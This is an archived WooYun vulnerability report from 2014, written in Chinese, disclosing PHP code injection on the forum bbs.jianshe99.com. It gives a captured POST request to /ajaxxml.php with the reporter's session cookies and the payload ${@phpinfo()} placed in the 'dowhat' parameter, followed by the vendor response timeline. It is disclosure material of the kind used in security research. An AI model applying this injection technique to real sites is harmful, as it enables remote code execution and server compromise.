乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-04-22: 细节已通知厂商并且等待厂商处理中 2014-04-27: 厂商已经主动忽略漏洞,细节向公众公开
任意代码执行你懂的
问题出在http://bbs.jianshe99.com/这个论坛 首先随便的打开一个帖子送鲜花
截包
POST /ajaxxml.php HTTP/1.1Host: bbs.jianshe99.comUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:28.0) Gecko/20100101 Firefox/28.0Accept: */*Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://bbs.jianshe99.com/forum-5-195/topic-1640176.htmlContent-Length: 43Cookie: Hm_lvt_b1646d7bf285efa474ea14b737e85446=1398006309,1398038153,1398038200,1398098132; CNZZDATA30039606=cnzz_eid%3D1561868909-1397929499-%26ntime%3D1398098133%26cnzz_a%3D3%26sin%3Dnone%26ltime%3D1398098132385%26rtime%3D2; CNZZDATA30036801=cnzz_eid%3D1271367639-1397929499-%26ntime%3D1398098130%26cnzz_a%3D3%26sin%3Dnone%26ltime%3D1398098132527%26rtime%3D2; Hm_lvt_d7689cf300ad742cd047593afd7f1d2f=1397927729,1397953140,1397990922,1398098120; Hm_lvt_89a2a3bf00cfac7dc961b07b7b987201=1397991764,1397992593,1397995371,1398098120; __utma=140739757.702307227.1397998349.1398047437.1398049746.5; __utmz=140739757.1398034245.3.3.utmcsr=jianshe99.com|utmccn=(referral)|utmcmd=referral|utmcct=/global/login-new.html; MemberEmail=""; emailNotify=0; BIGipServernew_bbs_pool=2030083539.20480.0000; Hm_lpvt_d7689cf300ad742cd047593afd7f1d2f=1398098120; Hm_lpvt_89a2a3bf00cfac7dc961b07b7b987201=1398098120; SID=459274e4bcb7dc35eb1684a125a1c4a9; Hm_lpvt_b1646d7bf285efa474ea14b737e85446=1398098328; ssouid=a1095150228%40jianshe99.com; viewtopics=W1606386W1651999W1640176; topictimestamp=Wtopic1606386%2A1397469668Wtopic1651999%2A1398006517Wtopic1640176%2A1398067880; VFIDS:4=0%2C7%2C195%2C6Connection: keep-alivePragma: no-cacheCache-Control: no-cacheact=plv&dowhat=canFlower&fid=195&rand=84375
问题出在dowhat这个参数为${@phpinfo()} 然后我们进入http://bbs.jianshe99.com/ajaxxml.php这个地址劫包改包修改dowhat后面的参数post发送一下嘿嘿
哈哈出来了吧
至于危害俺就不说了不深入 不拿shell 不看用户余额
你们懂哈哈 话说你们上次好像有点不良厂商的嫌疑
危害等级:无影响厂商忽略
忽略时间:2014-04-27 12:19
2014-04-28:已经确认,谢谢关注。
2014-04-28:貌似没有作者联系地址,刚索取了地址,有礼物送,谢谢。